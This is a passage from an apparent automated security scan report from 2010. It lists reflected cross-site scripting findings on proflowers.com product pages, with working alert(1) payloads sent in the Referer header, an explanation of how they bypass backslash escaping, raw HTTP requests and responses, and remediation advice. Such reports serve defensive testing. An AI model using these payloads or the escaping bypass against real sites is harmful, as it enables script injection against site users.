Set-Cookie: PFC_BrowserId=ca033de2-fb44-4218-b422-af92910aff36; domain=.proflowers.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; domain=.proflowers.com; path=/
Set-Cookie: CURRENTSESSION_=IPAddress=204.51.113.169; domain=.proflowers.com; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PFC=41275&12/16/2010 11:57:06 AM; domain=.proflowers.com; expires=Wed, 16-Mar-2011 18:57:06 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 16 Dec 2010 19:57:07 GMT
Connection: close
Content-Length: 150145


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
ndarOnZipEntry=ReloadCalendarOnZipEntry_in;this.ShowSummaryZipPanel=ShowSummaryZipPanel_in;};this.Rows = new Array(1);this.Rows[0]=new this.Row("41275","41275","41275","326802","14","organicgglgeneric_f9762\\";alert(1)//a99908c5e2b","","PFC","1",0,"",1,"xpa-1,xpb-1,pballoons-2,phl-2,pso-1,pfl-1,cnd-32,pvo-2,pbr-4,pcy-5,psk-1,poe-1,zzc-2,pjs-1,pcu-1,spg-1,mpsmediapersonalitysplit-1,ntd-1,nte-2,ntc-2,peo-1,pfp-2,phr-2,pjt-1,psv-3,
...[SNIP]...

2.156. http://products.proflowers.com/lilies/100-Blooms-of-Holiday-Cheer-40841 [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /lilies/100-Blooms-of-Holiday-Cheer-40841

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a42bd\"%3balert(1)//8b2c2e816a1 was submitted in the Referer HTTP header. This input was echoed as a42bd\\";alert(1)//8b2c2e816a1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /lilies/100-Blooms-of-Holiday-Cheer-40841 HTTP/1.1
Host: products.proflowers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.google.com/search?hl=en&q=a42bd\"%3balert(1)//8b2c2e816a1

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: BrowsingStore=pwhzftyqesayevcnovt2dia4; domain=proflowers.com; path=/
Set-Cookie: ASP.NET_SessionId=pwhzftyqesayevcnovt2dia4; path=/; HttpOnly
Set-Cookie: THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,pballoons-2,phl-2,pso-1,pjt-2,cnd-32,pvo-2,pbr-4,psk-2,pps-2,poe-2,zzc-2,pjs-3,pcu-1,pfl-1,mpsmediapersonalitysplit-1,ntd-1,nte-2,ntc-2,peo-2,pfp-1,phr-2,zza-2,psv-4,nta-2,ntb-2,pmo-1,ppr-1,spg-2,xpc-1,psr-2,pcy-5,zzb-1,gfr-1,apg-1,ppe-1,pcb-1; domain=.proflowers.com; expires=Mon, 16-Jan-2012 19:55:34 GMT; path=/
Set-Cookie: CURRENTSESSION_PFC=TestConfigDateTimeUpdated=12/16/2010 11:55:34 AM; domain=.proflowers.com; path=/
Set-Cookie: PRVD=SiteSplitID=57; domain=.proflowers.com; expires=Sun, 19-Dec-2010 19:55:34 GMT; path=/
Set-Cookie: PFC_BrowserId=aff92ee3-fd74-422a-8dbf-734be8506fba; domain=.proflowers.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; domain=.proflowers.com; path=/
Set-Cookie: CURRENTSESSION_=IPAddress=204.51.113.169; domain=.proflowers.com; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PFC=40841&12/16/2010 11:55:36 AM; domain=.proflowers.com; expires=Wed, 16-Mar-2011 18:55:36 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 16 Dec 2010 19:55:35 GMT
Connection: close
Content-Length: 165822


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
ndarOnZipEntry=ReloadCalendarOnZipEntry_in;this.ShowSummaryZipPanel=ShowSummaryZipPanel_in;};this.Rows = new Array(1);this.Rows[0]=new this.Row("40841","40841","40841","326162","57","organicgglgeneric_a42bd\\";alert(1)//8b2c2e816a1","","PFC","1",0,"",1,"xpa-1,xpb-1,pballoons-2,phl-2,pso-1,pfl-1,cnd-32,pvo-2,pbr-4,pcy-5,psk-2,poe-2,zzc-2,pjs-3,pcu-1,spg-2,mpsmediapersonalitysplit-1,ntd-1,nte-2,ntc-2,peo-2,pfp-1,phr-2,pjt-2,psv-4,
...[SNIP]...

2.157. http://products.proflowers.com/lilies/Deluxe-Fragrant-Stargazer-Lilies-41360 [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /lilies/Deluxe-Fragrant-Stargazer-Lilies-41360

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b4402\"%3balert(1)//fb296867e10 was submitted in the Referer HTTP header. This input was echoed as b4402\\";alert(1)//fb296867e10 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /lilies/Deluxe-Fragrant-Stargazer-Lilies-41360 HTTP/1.1
Host: products.proflowers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.google.com/search?hl=en&q=b4402\"%3balert(1)//fb296867e10

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: BrowsingStore=oxsgxj0bnuwqu2huqvo4y4d1; domain=proflowers.com; path=/
Set-Cookie: ASP.NET_SessionId=oxsgxj0bnuwqu2huqvo4y4d1; path=/; HttpOnly
Set-Cookie: THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,pballoons-2,phl-1,pso-1,pjt-1,cnd-34,pvo-2,pbr-3,psk-1,pps-1,poe-1,zzc-1,pjs-2,pcu-1,pfl-1,mpsmediapersonalitysplit-2,ntd-1,nte-3,ntc-2,peo-2,pfp-1,phr-2,zza-2,psv-3,nta-1,ntb-2,pmo-1,ppr-1,spg-1,xpc-1,psr-1,pcy-6,zzb-2,gfr-1,apg-1,ppe-2,pcb-1; domain=.proflowers.com; expires=Mon, 16-Jan-2012 19:55:38 GMT; path=/
Set-Cookie: CURRENTSESSION_PFC=TestConfigDateTimeUpdated=12/16/2010 11:55:38 AM; domain=.proflowers.com; path=/
Set-Cookie: PRVD=SiteSplitID=137; domain=.proflowers.com; expires=Sun, 19-Dec-2010 19:55:38 GMT; path=/
Set-Cookie: PFC_BrowserId=b909e1fc-b05b-4103-80d2-bd14077ff1f8; domain=.proflowers.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; domain=.proflowers.com; path=/
Set-Cookie: CURRENTSESSION_=IPAddress=204.51.113.169; domain=.proflowers.com; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PFC=41360&12/16/2010 11:55:40 AM; domain=.proflowers.com; expires=Wed, 16-Mar-2011 18:55:40 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 16 Dec 2010 19:55:41 GMT
Connection: close
Content-Length: 208238


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
darOnZipEntry=ReloadCalendarOnZipEntry_in;this.ShowSummaryZipPanel=ShowSummaryZipPanel_in;};this.Rows = new Array(1);this.Rows[0]=new this.Row("41360","41360","41360","398605","137","organicgglgeneric_b4402\\";alert(1)//fb296867e10","","PFC","1",0,"",1,"xpa-1,xpb-1,pballoons-2,phl-1,pso-1,pfl-1,cnd-34,pvo-2,pbr-3,pcy-6,psk-1,poe-1,zzc-1,pjs-2,pcu-1,spg-1,mpsmediapersonalitysplit-2,ntd-1,nte-3,ntc-2,peo-2,pfp-1,phr-2,pjt-1,psv-3,
...[SNIP]...

2.158. http://products.proflowers.com/lilies/Sympathy-Lilies-30002099 [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /lilies/Sympathy-Lilies-30002099

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ebbde\"%3balert(1)//66740408124 was submitted in the Referer HTTP header. This input was echoed as ebbde\\";alert(1)//66740408124 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /lilies/Sympathy-Lilies-30002099 HTTP/1.1
Host: products.proflowers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.google.com/search?hl=en&q=ebbde\"%3balert(1)//66740408124

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: BrowsingStore=oucso2yyiawuscynxpfmzyoi; domain=proflowers.com; path=/
Set-Cookie: ASP.NET_SessionId=oucso2yyiawuscynxpfmzyoi; path=/; HttpOnly
Set-Cookie: THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,pballoons-1,phl-1,pso-1,pjt-2,cnd-30,pvo-2,pbr-3,psk-1,pps-2,poe-2,zzc-1,pjs-3,pcu-1,pfl-1,mpsmediapersonalitysplit-2,ntd-2,nte-3,ntc-2,peo-2,pfp-2,phr-1,zza-2,psv-3,nta-2,ntb-2,pmo-1,ppr-1,spg-1,xpc-1,psr-2,pcy-7,zzb-1,gfr-2,apg-1,ppe-2,pcb-1; domain=.proflowers.com; expires=Mon, 16-Jan-2012 19:55:47 GMT; path=/
Set-Cookie: CURRENTSESSION_PFC=TestConfigDateTimeUpdated=12/16/2010 11:55:47 AM; domain=.proflowers.com; path=/
Set-Cookie: PRVD=SiteSplitID=107; domain=.proflowers.com; expires=Sun, 19-Dec-2010 19:55:47 GMT; path=/
Set-Cookie: PFC_BrowserId=0e2c621b-fa82-4296-96bd-dbe9215b6652; domain=.proflowers.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; domain=.proflowers.com; path=/
Set-Cookie: CURRENTSESSION_=IPAddress=204.51.113.169; domain=.proflowers.com; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30002099&12/16/2010 11:55:50 AM; domain=.proflowers.com; expires=Wed, 16-Mar-2011 18:55:50 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 16 Dec 2010 19:55:50 GMT
Connection: close
Content-Length: 138450


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
ntry=ReloadCalendarOnZipEntry_in;this.ShowSummaryZipPanel=ShowSummaryZipPanel_in;};this.Rows = new Array(1);this.Rows[0]=new this.Row("30002099","30002099","30002099","125155","107","organicgglgeneric_ebbde\\";alert(1)//66740408124","","PFC","1",0,"",1,"xpa-1,xpb-1,pballoons-1,phl-1,pso-1,pfl-1,cnd-30,pvo-2,pbr-3,pcy-7,psk-1,poe-2,zzc-1,pjs-3,pcu-1,spg-1,mpsmediapersonalitysplit-2,ntd-2,nte-3,ntc-2,peo-2,pfp-2,phr-1,pjt-2,psv-3,
...[SNIP]...

2.159. http://products.proflowers.com/lilies/Thinking-of-You-41407 [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /lilies/Thinking-of-You-41407

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c22c7\"%3balert(1)//91b449de02f was submitted in the Referer HTTP header. This input was echoed as c22c7\\";alert(1)//91b449de02f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /lilies/Thinking-of-You-41407 HTTP/1.1
Host: products.proflowers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.google.com/search?hl=en&q=c22c7\"%3balert(1)//91b449de02f

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: BrowsingStore=lxutnbte0cibanxndgeejwa1; domain=proflowers.com; path=/
Set-Cookie: ASP.NET_SessionId=lxutnbte0cibanxndgeejwa1; path=/; HttpOnly
Set-Cookie: THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,pballoons-1,phl-2,pso-1,pjt-1,cnd-32,pvo-1,pbr-4,psk-1,pps-2,poe-1,zzc-2,pjs-2,pcu-1,pfl-2,mpsmediapersonalitysplit-2,ntd-2,nte-2,ntc-2,peo-2,pfp-2,phr-1,zza-1,psv-3,nta-2,ntb-2,pmo-1,ppr-2,spg-1,xpc-1,psr-2,pcy-8,zzb-2,gfr-2,apg-2,ppe-1,pcb-1; domain=.proflowers.com; expires=Mon, 16-Jan-2012 19:55:25 GMT; path=/
Set-Cookie: CURRENTSESSION_PFC=TestConfigDateTimeUpdated=12/16/2010 11:55:25 AM; domain=.proflowers.com; path=/
Set-Cookie: PRVD=SiteSplitID=113; domain=.proflowers.com; expires=Sun, 19-Dec-2010 19:55:25 GMT; path=/
Set-Cookie: PFC_BrowserId=b01140bc-94a3-4356-92d3-6c69012f717d; domain=.proflowers.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; domain=.proflowers.com; path=/
Set-Cookie: CURRENTSESSION_=IPAddress=204.51.113.169; domain=.proflowers.com; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PFC=41407&12/16/2010 11:55:26 AM; domain=.proflowers.com; expires=Wed, 16-Mar-2011 18:55:26 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 16 Dec 2010 19:55:26 GMT
Connection: close
Content-Length: 153703


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
darOnZipEntry=ReloadCalendarOnZipEntry_in;this.ShowSummaryZipPanel=ShowSummaryZipPanel_in;};this.Rows = new Array(1);this.Rows[0]=new this.Row("41407","41407","41407","248746","113","organicgglgeneric_c22c7\\";alert(1)//91b449de02f","","PFC","1",0,"",1,"xpa-1,xpb-1,pballoons-1,phl-2,pso-1,pfl-2,cnd-32,pvo-1,pbr-4,pcy-8,psk-1,poe-1,zzc-2,pjs-2,pcu-1,spg-1,mpsmediapersonalitysplit-2,ntd-2,nte-2,ntc-2,peo-2,pfp-2,phr-1,pjt-1,psv-3,
...[SNIP]...

2.160. http://products.proflowers.com/plants/Candy-Cane-Christmas-Cactus-30045302 [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /plants/Candy-Cane-Christmas-Cactus-30045302

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f4fee\"%3balert(1)//2d77d2953f6 was submitted in the Referer HTTP header. This input was echoed as f4fee\\";alert(1)//2d77d2953f6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /plants/Candy-Cane-Christmas-Cactus-30045302 HTTP/1.1
Host: products.proflowers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.google.com/search?hl=en&q=f4fee\"%3balert(1)//2d77d2953f6

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: BrowsingStore=y1b4uoom32ji5ugob3jzcots; domain=proflowers.com; path=/
Set-Cookie: ASP.NET_SessionId=y1b4uoom32ji5ugob3jzcots; path=/; HttpOnly
Set-Cookie: THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,pballoons-1,phl-2,pso-1,pjt-2,cnd-31,pvo-1,pbr-4,psk-2,pps-2,poe-1,zzc-2,pjs-1,pcu-1,pfl-1,mpsmediapersonalitysplit-1,ntd-2,nte-2,ntc-2,peo-1,pfp-2,phr-2,zza-2,psv-4,nta-2,ntb-2,pmo-1,ppr-1,spg-1,xpc-1,psr-1,pcy-8,zzb-1,gfr-1,apg-1,ppe-1,pcb-1; domain=.proflowers.com; expires=Mon, 16-Jan-2012 19:55:52 GMT; path=/
Set-Cookie: CURRENTSESSION_PFC=TestConfigDateTimeUpdated=12/16/2010 11:55:52 AM; domain=.proflowers.com; path=/
Set-Cookie: PRVD=SiteSplitID=39; domain=.proflowers.com; expires=Sun, 19-Dec-2010 19:55:53 GMT; path=/
Set-Cookie: PFC_BrowserId=ad67c102-22a8-47a0-98b8-23fe1533ba3d; domain=.proflowers.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; domain=.proflowers.com; path=/
Set-Cookie: CURRENTSESSION_=IPAddress=204.51.113.169; domain=.proflowers.com; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30045302&12/16/2010 11:55:55 AM; domain=.proflowers.com; expires=Wed, 16-Mar-2011 18:55:55 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 16 Dec 2010 19:55:55 GMT
Connection: close
Content-Length: 145697


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
Entry=ReloadCalendarOnZipEntry_in;this.ShowSummaryZipPanel=ShowSummaryZipPanel_in;};this.Rows = new Array(1);this.Rows[0]=new this.Row("30045302","30045302","30045302","387967","39","organicgglgeneric_f4fee\\";alert(1)//2d77d2953f6","","PFC","1",0,"",1,"xpa-1,xpb-1,pballoons-1,phl-2,pso-1,pfl-1,cnd-31,pvo-1,pbr-4,pcy-8,psk-2,poe-1,zzc-2,pjs-1,pcu-1,spg-1,mpsmediapersonalitysplit-1,ntd-2,nte-2,ntc-2,peo-1,pfp-2,phr-2,pjt-2,psv-4,
...[SNIP]...

2.161. http://products.proflowers.com/pottedroses/Potted-Red-Roses-496 [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /pottedroses/Potted-Red-Roses-496

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 33a9e\"%3balert(1)//d40c6d94e58 was submitted in the Referer HTTP header. This input was echoed as 33a9e\\";alert(1)//d40c6d94e58 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /pottedroses/Potted-Red-Roses-496 HTTP/1.1
Host: products.proflowers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.google.com/search?hl=en&q=33a9e\"%3balert(1)//d40c6d94e58

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: BrowsingStore=3ufz1clxkgayml4ljt0rcs1f; domain=proflowers.com; path=/
Set-Cookie: ASP.NET_SessionId=3ufz1clxkgayml4ljt0rcs1f; path=/; HttpOnly
Set-Cookie: THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,pballoons-2,phl-2,pso-1,pjt-1,cnd-34,pvo-2,pbr-4,psk-2,pps-1,poe-2,zzc-1,pjs-2,pcu-1,pfl-2,mpsmediapersonalitysplit-2,ntd-1,nte-1,ntc-2,peo-1,pfp-1,phr-1,zza-2,psv-3,nta-1,ntb-2,pmo-1,ppr-2,spg-2,xpc-1,psr-1,pcy-7,zzb-1,gfr-1,apg-2,ppe-2,pcb-1; domain=.proflowers.com; expires=Mon, 16-Jan-2012 19:57:41 GMT; path=/
Set-Cookie: CURRENTSESSION_PFC=TestConfigDateTimeUpdated=12/16/2010 11:57:41 AM; domain=.proflowers.com; path=/
Set-Cookie: PRVD=SiteSplitID=54; domain=.proflowers.com; expires=Sun, 19-Dec-2010 19:57:41 GMT; path=/
Set-Cookie: PFC_BrowserId=6a300b31-346c-43e3-bee1-36e0b95710fb; domain=.proflowers.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; domain=.proflowers.com; path=/
Set-Cookie: CURRENTSESSION_=IPAddress=204.51.113.169; domain=.proflowers.com; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PFC=496&12/16/2010 11:57:44 AM; domain=.proflowers.com; expires=Wed, 16-Mar-2011 18:57:44 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 16 Dec 2010 19:57:44 GMT
Connection: close
Content-Length: 206522


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
adCalendarOnZipEntry=ReloadCalendarOnZipEntry_in;this.ShowSummaryZipPanel=ShowSummaryZipPanel_in;};this.Rows = new Array(1);this.Rows[0]=new this.Row("496","496","496","402933","54","organicgglgeneric_33a9e\\";alert(1)//d40c6d94e58","","PFC","1",0,"",1,"xpa-1,xpb-1,pballoons-2,phl-2,pso-1,pfl-2,cnd-34,pvo-2,pbr-4,pcy-7,psk-2,poe-2,zzc-1,pjs-2,pcu-1,spg-2,mpsmediapersonalitysplit-2,ntd-1,nte-1,ntc-2,peo-1,pfp-1,phr-1,pjt-1,psv-3,
...[SNIP]...

2.162. http://products.proflowers.com/roses/12-Candy-Cane-Roses-30045610 [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /roses/12-Candy-Cane-Roses-30045610

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6a601\"%3balert(1)//0f3b7296fd4 was submitted in the Referer HTTP header. This input was echoed as 6a601\\";alert(1)//0f3b7296fd4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

